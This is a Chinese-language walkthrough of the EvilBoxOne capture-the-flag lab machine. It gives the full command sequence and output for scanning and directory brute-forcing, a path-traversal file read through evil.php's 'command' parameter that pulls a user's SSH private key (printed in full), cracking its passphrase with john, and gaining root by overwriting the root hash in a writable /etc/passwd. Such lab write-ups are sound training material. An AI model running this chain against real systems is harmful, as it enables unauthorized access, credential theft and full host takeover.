环境配置
攻击者主机IP:192.168.47.130
目标主机IP:192.168.47.131
信息搜集
扫描目标主机,发现目标主机开放了22、80端口
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -sT -A -p- 192.168.47.131
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-08 07:46 EST
Nmap scan report for 192.168.47.131
Host is up (0.00061s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 44:95:50:0b:e4:73:a1:85:11:ca:10:ec:1c:cb:d4:26 (RSA)
| 256 27:db:6a:c7:3a:9c:5a:0e:47:ba:8d:81:eb:d6:d6:3c (ECDSA)
|_ 256 e3:07:56:a9:25:63:d4:ce:39:01:c1:9a:d9:fe:de:64 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:E9:5C:D1 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.61 ms 192.168.47.131
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.78 seconds
访问一下web页面发现是Apache默认页面
Web漏洞挖掘
使用gobuster爆破目录
┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.168.47.131 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.47.131
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,php.bak,txt.bak,git.bak,git,zip,zip.bak,txt,html,js,html.bak,json
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 10701]
/.html.bak (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/robots.txt (Status: 200) [Size: 12]
/secret (Status: 301) [Size: 317] [--> http://192.168.47.131/secret/]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/.html.bak (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 2867280 / 2867293 (100.00%)
===============================================================
Finished
===============================================================
访问/robots.txt,没有什么内容
访问/secret,发现是一个空白页面
因为/secret是一个目录,并不是一个页面,所以考虑接着爆破http://192.168.47.131/secret/
┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.168.47.131/secret/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.47.131/secret/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: zip.bak,php,txt.bak,git,git.bak,html.bak,json,zip,txt,html,js,php.bak
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 4]
/.html.bak (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/evil.php (Status: 200) [Size: 0]
/.html.bak (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
Progress: 2867280 / 2867293 (100.00%)
===============================================================
Finished
===============================================================
发现该路径下存在/evil.php,访问该页面,发现该页面还是一个空白页面。
那么只可能是这个php页面需要传递参数,但是目前不知道有哪些参数,所以尝试爆破这个参数。爆破时考虑会不会是文件包含漏洞或者命令执行,而通过上面的爆破可以知道,有一个页面是index.html,所以尝试读取这个页面,看看是不是文件包含漏洞。
这里使用fuff工具进行模糊枚举。
┌──(kali㉿kali)-[~]
└─$ ffuf -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://192.168.47.131/secret/evil.php?FUZZ=../index.html -fs 0
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.47.131/secret/evil.php?FUZZ=../index.html
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 0
________________________________________________
command [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 8ms]
:: Progress: [6453/6453] :: Job [1/1] :: 66 req/sec :: Duration: [0:00:04] :: Errors: 0 ::
经过爆破,发现存在一个可以读取文件的参数command,既然可以读取文件,那么尝试读取/etc/passwd文件,通过读取这个文件,发现除了root用户还有mowree用户。
通过一开始的扫描可以知道目标主机开放了SSH服务,所以,尝试读取/home/mowree/.ssh/id_rsa,看看是否存在私钥。
读取之后发现该私钥是存在的,那么我们就可以使用这个私钥的用户登录目标主机。
┌──(kali㉿kali)-[~/tools]
└─$ ssh mowree@192.168.47.131 -i id_rsa
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
mowree@192.168.47.131's password:
使用id_rsa登录目标主机的时候发现该私钥是加密的,那么尝试使用john爆破私钥密码。
首先使用john的脚本把私钥转换成john可识别的ssh密钥文件:
┌──(kali㉿kali)-[~/tools]
└─$ curl http://192.168.47.131/secret/evil.php?command=../../../../../../../../home/mowree/.ssh/id_rsa > id_rsa
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1743 100 1743 0 0 373k 0 --:--:-- --:--:-- --:--:-- 425k
┌──(kali㉿kali)-[~/tools]
└─$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E
uuQm2CFIe/eZT5pNyQ6+K1Uap/FYWcsEklzONt+x4AO6FmjFmR8RUpwMHurmbRC6
hqyoiv8vgpQgQRPYMzJ3QgS9kUCGdgC5+cXlNCST/GKQOS4QMQMUTacjZZ8EJzoe
o7+7tCB8Zk/sW7b8c3m4Cz0CmE5mut8ZyuTnB0SAlGAQfZjqsldugHjZ1t17mldb
+gzWGBUmKTOLO/gcuAZC+Tj+BoGkb2gneiMA85oJX6y/dqq4Ir10Qom+0tOFsuot
b7A9XTubgElslUEm8fGW64kX3x3LtXRsoR12n+krZ6T+IOTzThMWExR1Wxp4Ub/k
HtXTzdvDQBbgBf4h08qyCOxGEaVZHKaV/ynGnOv0zhlZ+z163SjppVPK07H4bdLg
9SC1omYunvJgunMS0ATC8uAWzoQ5Iz5ka0h+NOofUrVtfJZ/OnhtMKW+M948EgnY
zh7Ffq1KlMjZHxnIS3bdcl4MFV0F3Hpx+iDukvyfeeWKuoeUuvzNfVKVPZKqyaJu
rRqnxYW/fzdJm+8XViMQccgQAaZ+Zb2rVW0gyifsEigxShdaT5PGdJFKKVLS+bD1
tHBy6UOhKCn3H8edtXwvZN+9PDGDzUcEpr9xYCLkmH+hcr06ypUtlu9UrePLh/Xs
94KATK4joOIW7O8GnPdKBiI+3Hk0qakL1kyYQVBtMjKTyEM8yRcssGZr/MdVnYWm
VD5pEdAybKBfBG/xVu2CR378BRKzlJkiyqRjXQLoFMVDz3I30RpjbpfYQs2Dm2M7
Mb26wNQW4ff7qe30K/Ixrm7MfkJPzueQlSi94IHXaPvl4vyCoPLW89JzsNDsvG8P
hrkWRpPIwpzKdtMPwQbkPu4ykqgKkYYRmVlfX8oeis3C1hCjqvp3Lth0QDI+7Shr
Fb5w0n0qfDT4o03U1Pun2iqdI4M+iDZUF4S0BD3xA/zp+d98NnGlRqMmJK+StmqR
IIk3DRRkvMxxCm12g2DotRUgT2+mgaZ3nq55eqzXRh0U1P5QfhO+V8WzbVzhP6+R
MtqgW1L0iAgB4CnTIud6DpXQtR9l//9alrXa+4nWcDW2GoKjljxOKNK8jXs58SnS
62LrvcNZVokZjql8Xi7xL0XbEk0gtpItLtX7xAHLFTVZt4UH6csOcwq5vvJAGh69
Q/ikz5XmyQ+wDwQEQDzNeOj9zBh1+1zrdmt0m7hI5WnIJakEM2vqCqluN5CEs4u8
p1ia+meL0JVlLobfnUgxi3Qzm9SF2pifQdePVU4GXGhIOBUf34bts0iEIDf+qx2C
pwxoAe1tMmInlZfR2sKVlIeHIBfHq/hPf2PHvU0cpz7MzfY36x9ufZc5MH2JDT8X
KREAJ3S0pMplP/ZcXjRLOlESQXeUQ2yvb61m+zphg0QjWH131gnaBIhVIj1nLnTa
i99+vYdwe8+8nJq4/WXhkN+VTYXndET2H0fFNTFAqbk2HGy6+6qS/4Q6DVVxTHdp
4Dg2QRnRTjp74dQ1NZ7juucvW7DBFE+CK80dkrr9yFyybVUqBwHrmmQVFGLkS2I/
8kOVjIjFKkGQ4rNRWKVoo/HaRoI/f2G6tbEiOVclUMT8iutAg8S4VA==
-----END RSA PRIVATE KEY-----
┌──(kali㉿kali)-[~/tools]
└─$ /usr/share/john/ssh2john.py id_rsa > hash
接着,使用john爆破得到密码为unicorn:
┌──(kali㉿kali)-[~/tools]
└─$ john hash --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
unicorn (id_rsa)
1g 0:00:00:00 DONE (2023-11-08 09:13) 100.0g/s 124800p/s 124800c/s 124800C/s ramona..shirley
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
使用私钥密码登录目标主机
┌──(kali㉿kali)-[~/tools]
└─$ chmod 600 id_rsa
┌──(kali㉿kali)-[~/tools]
└─$ ssh mowree@192.168.47.131 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
mowree@EvilBoxOne:~$
提权
收集目标主机的信息
mowree@EvilBoxOne:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:e9:5c:d1 brd ff:ff:ff:ff:ff:ff
inet 192.168.47.131/24 brd 192.168.47.255 scope global dynamic ens33
valid_lft 1225sec preferred_lft 1225sec
inet6 fe80::20c:29ff:fee9:5cd1/64 scope link
valid_lft forever preferred_lft forever
mowree@EvilBoxOne:~$ uname -a
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
mowree@EvilBoxOne:~$ id
uid=1000(mowree) gid=1000(mowree) grupos=1000(mowree),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
mowree@EvilBoxOne:~$ pwd
/home/mowree
查找是否存在可以用于suid提权的文件,发现也没有
mowree@EvilBoxOne:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/su
直接使用linpeas脚本检查,通过该脚本的检查,发现对/etc/passwd具有可写权限
既然文件可读写,那么直接自定义一个密码,覆盖root用户的密码,首先自定义密码为12345678
mowree@EvilBoxOne:~$ openssl passwd -1
Password:
Verifying - Password:
$1$li.kLBR.$oyPpweUDzFxnBjNo/NXjx1
切换root用户,提权成功。
mowree@EvilBoxOne:~$ cat /etc/passwd | head -n 5
root:$1$li.kLBR.$oyPpweUDzFxnBjNo/NXjx1:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
mowree@EvilBoxOne:~$ su root
Contraseña:
root@EvilBoxOne:/home/mowree#